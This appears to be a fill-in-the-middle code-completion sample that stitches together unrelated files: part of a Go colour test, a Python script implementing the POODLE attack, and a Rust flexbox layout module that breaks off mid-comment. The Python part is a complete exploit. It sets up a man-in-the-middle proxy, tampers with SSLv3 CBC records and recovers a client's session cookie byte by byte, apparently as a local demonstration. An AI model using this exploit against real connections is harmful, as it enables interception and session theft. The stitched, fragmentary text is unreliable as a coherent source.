{RGB{R: 132, G: 135, B: 132}, 120, 2, 52},
}
for _, table := range tables {
h, s, v := table.rgb.HSV()
if h-table.h > 1 || table.h-h > 1 {
t.Errorf("H of %v was incorrect, got: %d wanted: %d\n", table.rgb, h, table.h)
}
if s != table.s {
t.Errorf("S of %v was incorrect, got: %d wanted: %d\n", table.rgb, s, table.s)
}
if v != table.v {
t.Errorf("V of %v was incorrect, got: %d wanted: %d\n", table.rgb, v, table.v)
}
}
}
func BenchmarkColorDistance(b *testing.B) {
colors := []RGB{
RGB{R: 78, G: 91, B: 112},
RGB{R: 165, G: 23, B: 139},
RGB{R: 221, G: 132, B: 90},
RGB{R: 89, G: 1, B: 55},
RGB{R: 132, G: 135, B: 132},
}
for i := 0; i < b.N; i++ {
for _, c1 := range colors {
for _, c2 := range colors {
c1.Distance(c2)
}
}
}
}<|fim▁end|> | l uint8
}{
{RGB{R: 78, G: 91, B: 112}, 217, 17, 37}, |
<|file_name|>poodle.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Poodle implementation with a client <--> proxy <--> server
'''
import argparse
import random
import re
import select
import socket
import SocketServer
import ssl
import string
import sys
import struct
import threading
import time
from utils.color import draw
from pprint import pprint
from struct import *
class SecureTCPHandler(SocketServer.BaseRequestHandler):
def handle(self):
self.request = ssl.wrap_socket(self.request, keyfile="cert/localhost.pem", certfile="cert/localhost.pem", server_side=True, ssl_version=ssl.PROTOCOL_SSLv3)
#loop to avoid broken pipe
while True:
try:
data = self.request.recv(1024)
if data == '':
break
self.request.send(b'OK')
except ssl.SSLError as e:
pass
return
class Server:
"""The secure server.
A sample server, serving on his host and port waiting the client
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
self.httpd = SocketServer.TCPServer((self.host, self.port), SecureTCPHandler)
server = threading.Thread(target=self.httpd.serve_forever)
server.daemon=True
server.start()
print('Server is serving HTTPS on {!r} port {}'.format(self.host, self.port))
return
def get_host(self):
return self.host
def get_port(self):
return self.port
def disconnect(self):
print('Server stop serving HTTPS on {!r} port {}'.format(self.host, self.port))
self.httpd.shutdown()
return
class Client:
""" The unsecure post of the client can be a "unsecure" browser for example.
The client generate a random cookie and send it to the server through the proxy
The attacker by injecting javascript code can control the sending request of the client to the proxy -> server
"""
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def connection(self):
# Initialization of the client
ssl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(ssl_sock, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((self.proxy_host,self.proxy_port))
ssl_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket = ssl_sock
return
def request(self, path=0, data=0):
srt_path = ''
srt_data = ''
for x in range(0,path):
srt_path += 'A'
for x in range(0,data):
srt_data += 'D'
try:
self.socket.sendall(b"GET /"+ srt_path +" HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n" + srt_data)
msg = "".join([str(i) for i in self.socket.recv(1024).split(b"\r\n")])
except ssl.SSLError as e:
pass
pass
return
def disconnect(self):
self.socket.close()
return
class ProxyTCPHandler(SocketServer.BaseRequestHandler):
"""
Start a connection to the secure server and handle multiple socket connections between the client and the server
Informe the attacker about the client's frames or the server's response
Finally redirect the data from the client to the server and inversely
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((server.get_host(), server.get_port()))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
data_altered = False
length_header = 24
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
data = socket_server.recv(1024)
if len(data) == 0:
running = False
break
if data_altered is True:
(content_type, version, length) = struct.unpack('>BHH', data[0:5])<|fim▁hole|> self.request.send(data)
elif source is self.request:
ssl_header = self.request.recv(5)
if ssl_header == '':
running = False
break
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
data = self.request.recv(length)
if len(data) == 0:
running = False
if length == 32:
length_header = 32
if content_type == 23 and length > length_header:
poodle.set_length_frame(data)
data = poodle.alter()
data_altered = True
# we send data to the server
socket_server.send(ssl_header+data)
return
class Proxy:
""" Assimilate to a MitmProxy
start a serving on his host and port and redirect the data to the server due to this handler
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer((self.host, self.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
print('Proxy is launched on {!r} port {}'.format(self.host, self.port))
self.proxy = httpd
return
def disconnect(self):
print('Proxy is stopped on {!r} port {}'.format(self.host, self.port))
self.proxy.shutdown()
return
class Poodle(Client):
""" Assimilate to the attacker
detect the length of a CBC block
alter the ethernet frame of the client to decipher a byte regarding the proxy informations
"""
def __init__(self, client):
self.client = client
self.length_block = 0
self.start_exploit = False
self.decipherable = False
self.request = ''
self.byte_decipher = 0
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def exploit(self):
# start at block 1, finish at block n-2
# 0 => IV unknow, n => padding block, n-1 => MAC block
length_f = self.length_frame
for i in range(1,(length_f/self.length_block) - 1):
self.current_block = i
for j in range(self.length_block-1, -1, -1):
(plain, nb_request) = self.find_plaintext_byte(self.frame,j)
self.request += plain
percent = 100.0 * self.byte_decipher / (length_f - 2 * self.length_block)
sys.stdout.write("\rProgression %2.0f%% - client's request %4s - byte found: %r" % (percent, nb_request, plain))
sys.stdout.flush()
return
def choosing_block(self, current_block):
return self.frame[current_block * self.length_block:(current_block + 1) * self.length_block]
def find_plaintext_byte(self, frame, byte):
nb_request = 0
plain = ""
print ''
while True:
self.client_connection()
prefix_length = byte
suffix_length = self.length_block - byte
self.send_request_from_the_client(self.length_block+self.nb_prefix+prefix_length, suffix_length)
# sleep to avoid "connection reset by peer" on macintosh
time.sleep(0.0001)
self.client_disconect()
if self.decipherable is True:
self.byte_decipher += 1
plain = self.decipher(self.frame)
self.decipherable = False
break
nb_request += 1
sys.stdout.write("\rclient's request %4s" % (nb_request))
sys.stdout.flush()
return (chr(plain), nb_request)
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
def decipher(self, data):
return self.choosing_block(self.current_block-1)[-1] ^ self.choosing_block(-2)[-1] ^ (self.length_block-1)
def alter(self):
if self.start_exploit is True:
self.frame = bytearray(self.frame)
self.frame = self.frame[:-self.length_block] + self.choosing_block(self.current_block)
return str(self.frame)
return self.frame
def set_decipherable(self, status):
self.decipherable = status
return
def set_length_frame(self, data):
self.frame = data
self.length_frame = len(data)
def client_connection(self):
self.client.connection()
return
def send_request_from_the_client(self, path=0, data=0):
self.client.request(path,data)
return
def client_disconect(self):
self.client.disconnect()
return
if __name__ == '__main__':
plan = """\
+-----------------+ +------------+ +-----------+
| +-------> | +--------> | |
| Client | | Proxy | | Server |
| | <-------+ | <--------+ |
+-----------------+ +---+---+----+ +-----------+
| |
^ | |
| +-----v---+------+
| | |
--+----------+ Attacker |
inject javascript | |
+----------------+
"""
parser = argparse.ArgumentParser(description='Connection with SSLv3')
parser.add_argument('host', help='hostname or IP address')
parser.add_argument('port', type=int, help='TCP port number')
parser.add_argument('-v', help='debug mode', action="store_true")
args = parser.parse_args()
print plan + "\n"
server = Server(args.host, args.port)
client = Client(args.host, args.port+1)
spy = Proxy(args.host, args.port+1)
poodle = Poodle(client)
server.connection()
spy.connection()
poodle.run()
spy.disconnect()
server.disconnect()<|fim▁end|> | if content_type == 23:
poodle.set_decipherable(True)
data_altered = False
# we send data to the client |
<|file_name|>layout.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at https://mozilla.org/MPL/2.0/. */
use super::geom::{
FlexAxis, FlexRelativeRect, FlexRelativeSides, FlexRelativeVec2, MainStartCrossStart,
};
use super::{FlexContainer, FlexLevelBox};
use crate::context::LayoutContext;
use crate::formatting_contexts::{IndependentFormattingContext, IndependentLayout};
use crate::fragments::{
AbsoluteOrFixedPositionedFragment, BoxFragment, CollapsedBlockMargins, Fragment,
};
use crate::geom::flow_relative::{Rect, Sides, Vec2};
use crate::geom::LengthOrAuto;
use crate::positioned::{AbsolutelyPositionedBox, PositioningContext};
use crate::sizing::ContentSizes;
use crate::style_ext::ComputedValuesExt;
use crate::ContainingBlock;
use atomic_refcell::AtomicRefMut;
use std::cell::Cell;
use style::properties::longhands::align_items::computed_value::T as AlignItems;
use style::properties::longhands::align_self::computed_value::T as AlignSelf;
use style::properties::longhands::box_sizing::computed_value::T as BoxSizing;
use style::properties::longhands::flex_direction::computed_value::T as FlexDirection;
use style::properties::longhands::flex_wrap::computed_value::T as FlexWrap;
use style::values::computed::length::Size;
use style::values::computed::Length;
use style::values::generics::flex::GenericFlexBasis as FlexBasis;
use style::Zero;
// FIMXE: “Flex items […] `z-index` values other than `auto` create a stacking context
// even if `position` is `static` (behaving exactly as if `position` were `relative`).”
// https://drafts.csswg.org/css-flexbox/#painting
// (likely in `display_list/stacking_context.rs`)
/// Layout parameters and intermediate results about a flex container,
/// grouped to avoid passing around many parameters
struct FlexContext<'a> {
layout_context: &'a LayoutContext<'a>,
positioning_context: &'a mut PositioningContext,
containing_block: &'a ContainingBlock<'a>, // For items
container_is_single_line: bool,
container_min_cross_size: Length,
container_max_cross_size: Option<Length>,
flex_axis: FlexAxis,
main_start_cross_start_sides_are: MainStartCrossStart,
container_definite_inner_size: FlexRelativeVec2<Option<Length>>,
align_items: AlignItems,
}
/// A flex item with some intermediate results
struct FlexItem<'a> {
box_: &'a mut IndependentFormattingContext,
tree_rank: usize,
content_box_size: FlexRelativeVec2<LengthOrAuto>,
content_min_size: FlexRelativeVec2<Length>,
content_max_size: FlexRelativeVec2<Option<Length>>,
padding: FlexRelativeSides<Length>,
border: FlexRelativeSides<Length>,
margin: FlexRelativeSides<LengthOrAuto>,
/// Sum of padding, border, and margin (with `auto` assumed to be zero) in each axis.
/// This is the difference between an outer and inner size.
pbm_auto_is_zero: FlexRelativeVec2<Length>,
/// https://drafts.csswg.org/css-flexbox/#algo-main-item
flex_base_size: Length,
/// https://drafts.csswg.org/css-flexbox/#algo-main-item
hypothetical_main_size: Length,
/// This is `align-self`, defaulting to `align-items` if `auto`
align_self: AlignItems,
}
/// A flex line with some intermediate results
struct FlexLine<'a> {
items: &'a mut [FlexItem<'a>],
outer_hypothetical_main_sizes_sum: Length,
}
/// Return type of `FlexItem::layout`
struct FlexItemLayoutResult {
hypothetical_cross_size: Length,
fragments: Vec<Fragment>,
positioning_context: PositioningContext,
}
/// Return type of `FlexLine::layout`
struct FlexLineLayoutResult {
cross_size: Length,
item_fragments: Vec<BoxFragment>, // One per flex item, in the given order
}
impl FlexContext<'_> {
fn vec2_to_flex_relative<T>(&self, x: Vec2<T>) -> FlexRelativeVec2<T> {
self.flex_axis.vec2_to_flex_relative(x)
}
fn sides_to_flex_relative<T>(&self, x: Sides<T>) -> FlexRelativeSides<T> {
self.main_start_cross_start_sides_are
.sides_to_flex_relative(x)
}
fn sides_to_flow_relative<T>(&self, x: FlexRelativeSides<T>) -> Sides<T> {
self.main_start_cross_start_sides_are
.sides_to_flow_relative(x)
}
fn rect_to_flow_relative(
&self,
base_rect_size: FlexRelativeVec2<Length>,
rect: FlexRelativeRect<Length>,
) -> Rect<Length> {
super::geom::rect_to_flow_relative(
self.flex_axis,
self.main_start_cross_start_sides_are,
base_rect_size,
rect,
)
}
fn align_for(&self, align_self: &AlignSelf) -> AlignItems {
match align_self {
AlignSelf::Auto => self.align_items,
AlignSelf::Stretch => AlignItems::Stretch,
AlignSelf::FlexStart => AlignItems::FlexStart,
AlignSelf::FlexEnd => AlignItems::FlexEnd,
AlignSelf::Center => AlignItems::Center,
AlignSelf::Baseline => AlignItems::Baseline,
}
}
}
impl FlexContainer {
pub fn inline_content_sizes(&self) -> ContentSizes {
// FIXME: implement this. The spec for it is the same as for "normal" layout:
// https://drafts.csswg.org/css-flexbox/#layout-algorithm
// … except that the parts that say “the flex container is being sized
// under a min or max-content constraint” apply.
ContentSizes::zero() // Return an incorrect result rather than panic
}
/// https://drafts.csswg.org/css-flexbox/#layout-algorithm
pub(crate) fn layout(
&self,
layout_context: &LayoutContext,
positioning_context: &mut PositioningContext,
containing_block: &ContainingBlock,
tree_rank: usize,
) -> IndependentLayout {
// Actual length may be less, but we guess that usually not by a lot
let mut flex_items = Vec::with_capacity(self.children.len());
// Absolutely-positioned children of the flex container may be interleaved
// with flex items. We need to preserve their relative order for correct painting order,
// which is the order of `Fragment`s in this function’s return value.
let original_order_with_absolutely_positioned = self
.children
.iter()
.enumerate()
.map(|(tree_rank, arcrefcell)| {
let borrowed = arcrefcell.borrow_mut();
match &*borrowed {
FlexLevelBox::OutOfFlowAbsolutelyPositionedBox(absolutely_positioned) => {
Ok(absolutely_positioned.clone())
},
FlexLevelBox::FlexItem(_) => {
let item = AtomicRefMut::map(borrowed, |child| match child {
FlexLevelBox::FlexItem(item) => item,
_ => unreachable!(),
});
flex_items.push((tree_rank, item));
Err(())
},
}
})
.collect::<Vec<_>>();
let mut content_block_size_option_dance = None;
let fragments =
positioning_context.adjust_static_positions(tree_rank, |positioning_context| {
let (mut flex_item_fragments, content_block_size) = layout(
layout_context,
positioning_context,
containing_block,
flex_items
.iter_mut()
.map(|(tree_rank, child)| (*tree_rank, &mut **child)),
);
content_block_size_option_dance = Some(content_block_size);
let fragments = original_order_with_absolutely_positioned
.into_iter()
.enumerate()
.map(|(tree_rank, child_as_abspos)| match child_as_abspos {
Err(()) => {
// The `()` here is a place-holder for a flex item.
// The `flex_item_fragments` iterator yields one fragment
// per flex item, in the original order.
Fragment::Box(flex_item_fragments.next().unwrap())
},
Ok(absolutely_positioned) => {
let position = absolutely_positioned
.borrow()
.context
.style()
.clone_position();
let hoisted_box = AbsolutelyPositionedBox::to_hoisted(
absolutely_positioned,
Vec2::zero(),
tree_rank,
containing_block,
);
let hoisted_fragment = hoisted_box.fragment.clone();
positioning_context.push(hoisted_box);
Fragment::AbsoluteOrFixedPositioned(AbsoluteOrFixedPositionedFragment {
hoisted_fragment,
position,
})
},
})
.collect::<Vec<_>>();
// There should be no more flex items
assert!(flex_item_fragments.next().is_none());
fragments
});
IndependentLayout {
fragments,
content_block_size: content_block_size_option_dance.unwrap(),
}
}
}
/// Return one fragment for each flex item, in the provided order, and the used block-size.
fn layout<'context, 'boxes>(
layout_context: &LayoutContext,
positioning_context: &mut PositioningContext,
containing_block: &ContainingBlock,
flex_item_boxes: impl Iterator<Item = (usize, &'boxes mut IndependentFormattingContext)>,
) -> (impl Iterator<Item = BoxFragment>, Length) {
// FIXME: get actual min/max cross size for the flex container.
// We have access to style for the flex container in `containing_block.style`,
// but resolving percentages there requires access
// to the flex container’s own containing block which we don’t have.
// For now, use incorrect values instead of panicking:
let container_min_cross_size = Length::zero();
let container_max_cross_size = None;
let flex_container_position_style = containing_block.style.get_position();
let flex_wrap = flex_container_position_style.flex_wrap;
let flex_direction = flex_container_position_style.flex_direction;
// Column flex containers are not fully implemented yet,
// so give a different layout instead of panicking.
// FIXME: implement `todo!`s for FlexAxis::Column below, and remove this
let flex_direction = match flex_direction {
FlexDirection::Row | FlexDirection::Column => FlexDirection::Row,
FlexDirection::RowReverse | FlexDirection::ColumnReverse => FlexDirection::RowReverse,
};
let container_is_single_line = match containing_block.style.get_position().flex_wrap {
FlexWrap::Nowrap => true,
FlexWrap::Wrap | FlexWrap::WrapReverse => false,
};
let flex_axis = FlexAxis::from(flex_direction);
let flex_wrap_reverse = match flex_wrap {
FlexWrap::Nowrap | FlexWrap::Wrap => false,
FlexWrap::WrapReverse => true,
};
let align_items = containing_block.style.clone_align_items();
let mut flex_context = FlexContext {
layout_context,
positioning_context,
containing_block,
container_min_cross_size,
container_max_cross_size,
container_is_single_line,
flex_axis,
align_items,
main_start_cross_start_sides_are: MainStartCrossStart::from(
flex_direction,
flex_wrap_reverse,
),
// https://drafts.csswg.org/css-flexbox/#definite-sizes
container_definite_inner_size: flex_axis.vec2_to_flex_relative(Vec2 {
inline: Some(containing_block.inline_size),
block: containing_block.block_size.non_auto(),
}),
};
let mut flex_items = flex_item_boxes
.map(|(tree_rank, box_)| FlexItem::new(&flex_context, box_, tree_rank))
.collect::<Vec<_>>();
// “Determine the main size of the flex container”
// https://drafts.csswg.org/css-flexbox/#algo-main-container
let container_main_size = match flex_axis {
FlexAxis::Row => containing_block.inline_size,
FlexAxis::Column => {
// FIXME “using the rules of the formatting context in which it participates”
// but if block-level with `block-size: max-auto` that requires
// layout of the content to be fully done:
// https://github.com/w3c/csswg-drafts/issues/4905
// Gecko reportedly uses `block-size: fit-content` in this case
// (which requires running another pass of the "full" layout algorithm)
todo!()
// Note: this panic shouldn’t happen since the start of `FlexContainer::layout`
// forces `FlexAxis::Row`.
},
};
// “Resolve the flexible lengths of all the flex items to find their *used main size*.”
// https://drafts.csswg.org/css-flexbox/#algo-flex
let flex_lines = collect_flex_lines(
&mut flex_context,
container_main_size,
&mut flex_items,
|flex_context, mut line| line.layout(flex_context, container_main_size),
);
// https://drafts.csswg.org/css-flexbox/#algo-cross-container
let container_cross_size = flex_context
.container_definite_inner_size
.cross
.unwrap_or_else(|| {
flex_lines
.iter()
.map(|line| line.cross_size)
.sum::<Length>()
})
.clamp_between_extremums(
flex_context.container_min_cross_size,
flex_context.container_max_cross_size,
);
// https://drafts.csswg.org/css-flexbox/#algo-line-align
let mut cross_start_position_cursor = Length::zero();
let line_cross_start_positions = flex_lines
.iter()
.map(|line| {
// FIXME: “Align all flex lines per `align-content`.”
// For now we hard-code the behavior of `align-content: flex-start`.
let cross_start = cross_start_position_cursor;
let cross_end = cross_start + line.cross_size;
cross_start_position_cursor = cross_end;
cross_start
})
.collect::<Vec<_>>();
let content_block_size = match flex_context.flex_axis {
FlexAxis::Row => {
// `container_main_size` ends up unused here but in this case that’s fine
// since it was already excatly the one decided by the outer formatting context.
container_cross_size
},
FlexAxis::Column => {
// FIXME: `container_cross_size` ends up unused here, which is a bug.
// It is meant to be the used inline-size, but the parent formatting context
// has already decided a possibly-different used inline-size.
// The spec is missing something to resolve this conflict:
// https://github.com/w3c/csswg-drafts/issues/5190
// And we’ll need to change the signature of `IndependentFormattingContext::layout`
// to allow the inner formatting context to “negociate” a used inline-size
// with the outer one somehow.
container_main_size
},
};
let fragments = flex_lines
.into_iter()
.zip(line_cross_start_positions)
.flat_map(move |(mut line, line_cross_start_position)| {
let flow_relative_line_position = match (flex_axis, flex_wrap_reverse) {
(FlexAxis::Row, false) => Vec2 {
block: line_cross_start_position,
inline: Length::zero(),
},
(FlexAxis::Row, true) => Vec2 {
block: container_cross_size - line_cross_start_position - line.cross_size,
inline: Length::zero(),
},
(FlexAxis::Column, false) => Vec2 {
block: Length::zero(),
inline: line_cross_start_position,
},
(FlexAxis::Column, true) => Vec2 {
block: Length::zero(),
inline: container_cross_size - line_cross_start_position - line.cross_size,
},
};
for fragment in &mut line.item_fragments {
fragment.content_rect.start_corner += &flow_relative_line_position
}
line.item_fragments
})
.into_iter();
(fragments, content_block_size)
}
impl<'a> FlexItem<'a> {
fn new(
flex_context: &FlexContext,
box_: &'a mut IndependentFormattingContext,
tree_rank: usize,
) -> Self {
let containing_block = flex_context.containing_block;
let box_style = box_.style();
// https://drafts.csswg.org/css-writing-modes/#orthogonal-flows
assert_eq!(
containing_block.style.writing_mode, box_style.writing_mode,
"Mixed writing modes are not supported yet"
);
let container_is_horizontal = containing_block.style.writing_mode.is_horizontal();
let item_is_horizontal = box_style.writing_mode.is_horizontal();
let item_is_orthogonal = item_is_horizontal != container_is_horizontal;
let container_is_row = flex_context.flex_axis == FlexAxis::Row;
let cross_axis_is_item_block_axis = container_is_row ^ item_is_orthogonal;
let pbm = box_style.padding_border_margin(containing_block);
let content_box_size = box_style.content_box_size(containing_block, &pbm);
let max_size = box_style.content_max_box_size(containing_block, &pbm);
let min_size = box_style.content_min_box_size(containing_block, &pbm);
let min_size = min_size.auto_is(|| automatic_min_size(box_));
let margin_auto_is_zero = pbm.margin.auto_is(Length::zero);
let content_box_size = flex_context.vec2_to_flex_relative(content_box_size);
let content_max_size = flex_context.vec2_to_flex_relative(max_size);
let content_min_size = flex_context.vec2_to_flex_relative(min_size);
let margin_auto_is_zero = flex_context.sides_to_flex_relative(margin_auto_is_zero);
let margin = flex_context.sides_to_flex_relative(pbm.margin);
let padding = flex_context.sides_to_flex_relative(pbm.padding);
let border = flex_context.sides_to_flex_relative(pbm.border);
let padding_border = padding.sum_by_axis() + border.sum_by_axis();
let pbm_auto_is_zero = padding_border + margin_auto_is_zero.sum_by_axis();
let align_self = flex_context.align_for(&box_style.clone_align_self());
let flex_base_size = flex_base_size(
flex_context,
box_,
cross_axis_is_item_block_axis,
content_box_size,
padding_border,
);
let hypothetical_main_size =
flex_base_size.clamp_between_extremums(content_min_size.main, content_max_size.main);
Self {
box_,
tree_rank,
content_box_size,
content_min_size,
content_max_size,
padding,
border,
margin,
pbm_auto_is_zero,
flex_base_size,
hypothetical_main_size,
align_self,
}
}
}
/// https://drafts.csswg.org/css-flexbox/#min-size-auto
fn automatic_min_size(_box: &IndependentFormattingContext) -> Length {
// FIMXE: implement the actual algorithm
Length::zero() // Give an incorrect value rather than panicking
}
/// https://drafts.csswg.org/css-flexbox/#algo-main-item
fn flex_base_size(
flex_context: &FlexContext,
flex_item: &mut IndependentFormattingContext,
cross_axis_is_item_block_axis: bool,
content_box_size: FlexRelativeVec2<LengthOrAuto>,
padding_border_sums: FlexRelativeVec2<Length>,
) -> Length {
let used_flex_basis = match &flex_item.style().get_position().flex_basis {
FlexBasis::Content => FlexBasis::Content,
FlexBasis::Size(Size::LengthPercentage(length_percentage)) => {
let apply_box_sizing = |length: Length| {
match flex_item.style().get_position().box_sizing {
BoxSizing::ContentBox => length,
BoxSizing::BorderBox => {
// This may make `length` negative,
// but it will be clamped in the hypothetical main size
length - padding_border_sums.main
},
}
};
// “For example, percentage values of flex-basis are resolved
// against the flex item’s containing block (i.e. its flex container);”
match flex_context.container_definite_inner_size.main {
Some(container_definite_main_size) => {
let length = length_percentage
.0
.percentage_relative_to(container_definite_main_size);
FlexBasis::Size(apply_box_sizing(length))
},
None => {
if let Some(length) = length_percentage.0.to_length() {
FlexBasis::Size(apply_box_sizing(length))
} else {
// “and if that containing block’s size is indefinite,
// the used value for `flex-basis` is `content`.”
// https://drafts.csswg.org/css-flexbox/#flex-basis-property
FlexBasis::Content
}
},
}
},
FlexBasis::Size(Size::Auto) => {
// “When specified on a flex item, the `auto` keyword retrieves
// the value of the main size property as the used `flex-basis`.”
match content_box_size.main {
LengthOrAuto::LengthPercentage(length) => FlexBasis::Size(length),
// “If that value is itself `auto`, then the used value is `content`.”
LengthOrAuto::Auto => FlexBasis::Content,
}
},
};
// NOTE: at this point the flex basis is either `content` or a definite length.
// However when we add support for additional values for `width` and `height`
// from https://drafts.csswg.org/css-sizing/#preferred-size-properties,
// it could have those values too.
match used_flex_basis {
FlexBasis::Size(length) => {
// Case A: definite flex basis
length
},
FlexBasis::Content => {<|fim▁hole|> // “treating a value of content as max-content.”
if cross_axis_is_item_block_axis {
// The main axis is the inline axis
flex_item
.inline_content_sizes(flex_context.layout_context)
.max_content
} else {
// FIXME: block-axis content sizing requires another pass
// of "full" layout
todo!()
// Note: this panic shouldn’t happen since the start of `FlexContainer::layout`
// forces `FlexAxis::Row` and the `writing-mode` property is disabled.
}
},
}
}
// “Collect flex items into flex lines”
// https://drafts.csswg.org/css-flexbox/#algo-line-break
fn collect_flex_lines<'items, LineResult>(
flex_context: &mut FlexContext,
container_main_size: Length,
mut items: &'items mut [FlexItem<'items>],
mut each: impl FnMut(&mut FlexContext, FlexLine<'items>) -> LineResult,
) -> Vec<LineResult> {
if flex_context.container_is_single_line {
let line = FlexLine {
outer_hypothetical_main_sizes_sum: items
.iter()
.map(|item| item.hypothetical_main_size + item.pbm_auto_is_zero.main)
.sum(),
items,
};
return vec![each(flex_context, line)];
} else {
let mut lines = Vec::new();
let mut line_size_so_far = Length::zero();
let mut line_so_far_is_empty = true;
let mut index = 0;
while let Some(item) = items.get(index) {
let item_size = item.hypothetical_main_size + item.pbm_auto_is_zero.main;
let line_size_would_be = line_size_so_far + item_size;
let item_fits = line_size_would_be <= container_main_size;
if item_fits || line_so_far_is_empty {
line_size_so_far = line_size_would_be;
line_so_far_is_empty = false;
index += 1;
} else {
// We found something that doesn’t fit. This line ends *before* this item.
let (line_items, rest) = items.split_at_mut(index);
let line = FlexLine {
items: line_items,
outer_hypothetical_main_sizes_sum: line_size_so_far,
};
items = rest;
lines.push(each(flex_context, line));
// The next line has this item.
line_size_so_far = item_size;
index = 1;
}
}
// The last line is added even without finding an item that doesn’t fit
let line = FlexLine {
items,
outer_hypothetical_main_sizes_sum: line_size_so_far,
};
lines.push(each(flex_context, line));
lines
}
}
impl FlexLine<'_> {
fn layout(
&mut self,
flex_context: &mut FlexContext,
container_main_size: Length,
) -> FlexLineLayoutResult {
let (item_used_main_sizes, remaining_free_space) =
self.resolve_flexible_lengths(container_main_size);
// https://drafts.csswg.org/css-flexbox/#algo-cross-item
let item_layout_results = self
.items
.iter_mut()
.zip(&item_used_main_sizes)
.map(|(item, &used_main_size)| item.layout(used_main_size, flex_context, None))
.collect::<Vec<_>>();
// https://drafts.csswg.org/css-flexbox/#algo-cross-line
let line_cross_size = self.cross_size(&item_layout_results, &flex_context);
let line_size = FlexRelativeVec2 {
main: container_main_size,
cross: line_cross_size,
};
// FIXME: Handle `align-content: stretch`
// https://drafts.csswg.org/css-flexbox/#algo-line-stretch
// FIXME: Collapse `visibility: collapse` items
// This involves “restart layout from the beginning” with a modified second round,
// which will make structuring the code… interesting.
// https://drafts.csswg.org/css-flexbox/#algo-visibility
// Determine the used cross size of each flex item
// https://drafts.csswg.org/css-flexbox/#algo-stretch
let (item_used_cross_sizes, item_fragments): (Vec<_>, Vec<_>) = self
.items
.iter_mut()
.zip(item_layout_results)
.zip(&item_used_main_sizes)
.map(|((item, mut item_result), &used_main_size)| {
let has_stretch = item.align_self == AlignItems::Stretch;
let cross_size = if has_stretch &&
item.content_box_size.cross.is_auto() &&
!(item.margin.cross_start.is_auto() || item.margin.cross_end.is_auto())
{
(line_cross_size - item.pbm_auto_is_zero.cross).clamp_between_extremums(
item.content_min_size.cross,
item.content_max_size.cross,
)
} else {
item_result.hypothetical_cross_size
};
if has_stretch {
// “If the flex item has `align-self: stretch`, redo layout for its contents,
// treating this used size as its definite cross size
// so that percentage-sized children can be resolved.”
item_result = item.layout(used_main_size, flex_context, Some(cross_size));
}
flex_context
.positioning_context
.append(item_result.positioning_context);
(cross_size, item_result.fragments)
})
.unzip();
// Distribute any remaining free space
// https://drafts.csswg.org/css-flexbox/#algo-main-align
let item_main_margins = self.resolve_auto_main_margins(remaining_free_space);
// FIXME: “Align the items along the main-axis per justify-content.”
// For now we hard-code `justify-content` to `flex-start`.
// https://drafts.csswg.org/css-flexbox/#algo-cross-margins
let item_cross_margins = self.items.iter().zip(&item_used_cross_sizes).map(
|(item, &item_cross_content_size)| {
item.resolve_auto_cross_margins(
&flex_context,
line_cross_size,
item_cross_content_size,
)
},
);
let item_margins = item_main_margins
.zip(item_cross_margins)
.map(
|((main_start, main_end), (cross_start, cross_end))| FlexRelativeSides {
main_start,
main_end,
cross_start,
cross_end,
},
)
.collect::<Vec<_>>();
// https://drafts.csswg.org/css-flexbox/#algo-main-align
let items_content_main_start_positions =
self.align_along_main_axis(&item_used_main_sizes, &item_margins);
// https://drafts.csswg.org/css-flexbox/#algo-cross-align
let item_content_cross_start_posititons = self
.items
.iter()
.zip(&item_margins)
.zip(&item_used_cross_sizes)
.map(|((item, margin), size)| {
item.align_along_cross_axis(margin, size, line_cross_size)
});
let item_fragments = self
.items
.iter()
.zip(item_fragments)
.zip(
item_used_main_sizes
.iter()
.zip(&item_used_cross_sizes)
.map(|(&main, &cross)| FlexRelativeVec2 { main, cross })
.zip(
items_content_main_start_positions
.zip(item_content_cross_start_posititons)
.map(|(main, cross)| FlexRelativeVec2 { main, cross }),
)
.map(|(size, start_corner)| FlexRelativeRect { size, start_corner }),
)
.zip(&item_margins)
.map(|(((item, fragments), content_rect), margin)| {
let content_rect = flex_context.rect_to_flow_relative(line_size, content_rect);
let margin = flex_context.sides_to_flow_relative(*margin);
let collapsed_margin = CollapsedBlockMargins::from_margin(&margin);
BoxFragment::new(
item.box_.tag(),
item.box_.style().clone(),
fragments,
content_rect,
flex_context.sides_to_flow_relative(item.padding),
flex_context.sides_to_flow_relative(item.border),
margin,
collapsed_margin,
)
})
.collect();
FlexLineLayoutResult {
cross_size: line_cross_size,
item_fragments,
}
}
/// Return the *main size* of each item, and the line’s remainaing free space
